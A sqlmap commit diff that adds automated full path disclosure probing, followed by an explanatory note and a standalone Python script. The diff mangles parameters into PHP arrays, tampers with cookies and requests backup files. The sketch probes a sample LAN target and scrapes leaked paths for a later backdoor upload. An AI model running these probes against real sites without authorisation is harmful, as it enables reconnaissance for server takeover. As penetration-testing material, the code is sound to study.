mirror of https://github.com/sqlmapproject/sqlmap.git
Implementation for Issue #1895 (provoking full path disclosure)
@@ -26,6 +26,7 @@ from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import parseFilePaths
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
@@ -38,8 +39,10 @@ from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
@@ -196,6 +199,60 @@ class Web:
                self.webApi = choices[int(choice) - 1]
                break

        if not kb.absFilePaths:
            message = "do you want sqlmap to further try to "
            message += "provoke the full path disclosure? [Y/n] "
            getOutput = readInput(message, default="Y")

            if getOutput in ("y", "Y"):
                headers = {}
                been = {conf.url}

                for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I):
                    url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
                    if url not in been:
                        try:
                            page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
                            parseFilePaths(page)
                        except:
                            pass
                        finally:
                            been.add(url)

                url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
                if url not in been:
                    try:
                        page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
                        parseFilePaths(page)
                    except:
                        pass
                    finally:
                        been.add(url)

                for place in (PLACE.GET, PLACE.POST):
                    if place in conf.parameters:
                        value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
                        if "[]" in value:
                            page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
                            parseFilePaths(page)

                cookie = None
                if PLACE.COOKIE in conf.parameters:
                    cookie = conf.parameters[PLACE.COOKIE]
                elif headers and HTTP_HEADER.SET_COOKIE in headers:
                    cookie = headers[HTTP_HEADER.SET_COOKIE]

                if cookie:
                    value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
                    if value != cookie:
                        page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                        parseFilePaths(page)

                    value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
                    if value != cookie:
                        page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
                        parseFilePaths(page)

        directories = list(arrayizeValue(getManualDirectories()))
        directories.extend(getAutoDirectories())
        directories = list(oset(directories))
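Note on the technique (not part of the commit itself): the added block tries to provoke a full path disclosure by sending slightly malformed requests, e.g. turning a scalar GET/POST parameter into a PHP array ("name[]="), tampering with cookie values, or requesting leftovers such as "script.php~" and WordPress' "wp-content/wp-db.php"; any PHP warning in the response is then mined for absolute paths via parseFilePaths(). Below is a minimal standalone sketch of just the parameter-array trick; the target URL, parameter name and path regex are illustrative assumptions, not sqlmap internals.

# Standalone sketch (assumed example, not sqlmap code): provoke a full path
# disclosure by turning "param=value" into "param[]=value" and scraping any
# absolute paths leaked in the resulting PHP warnings.
import re
import urllib.parse
import urllib.request

def provoke_fpd(url, param):
    # Same idea as the commit's re.sub(r"(\A|&)(\w+)=", ...) on GET/POST data,
    # but limited to one named parameter of a plain URL.
    parsed = urllib.parse.urlsplit(url)
    query = re.sub(r"(\A|&)(%s)=" % re.escape(param), r"\g<1>\g<2>[]=", parsed.query)
    probe = urllib.parse.urlunsplit(parsed._replace(query=query))

    try:
        with urllib.request.urlopen(probe, timeout=10) as response:
            page = response.read().decode("utf-8", "replace")
    except Exception:
        return []

    # Rough stand-in for parseFilePaths(): pick up Unix/Windows-looking script
    # paths from typical warning text ("... in /var/www/html/index.php on line 2").
    return re.findall(r"(?:in|file) ((?:/|[A-Za-z]:\\)[\w./\\-]+\.php)", page)

if __name__ == "__main__":
    # Hypothetical target used only for illustration.
    for path in provoke_fpd("http://192.168.56.101/index.php?id=1", "id"):
        print("possible absolute path: %s" % path)

In the commit, paths harvested this way end up in kb.absFilePaths, which the surrounding code in lib/takeover/web.py uses when guessing writable web directories for the stager upload.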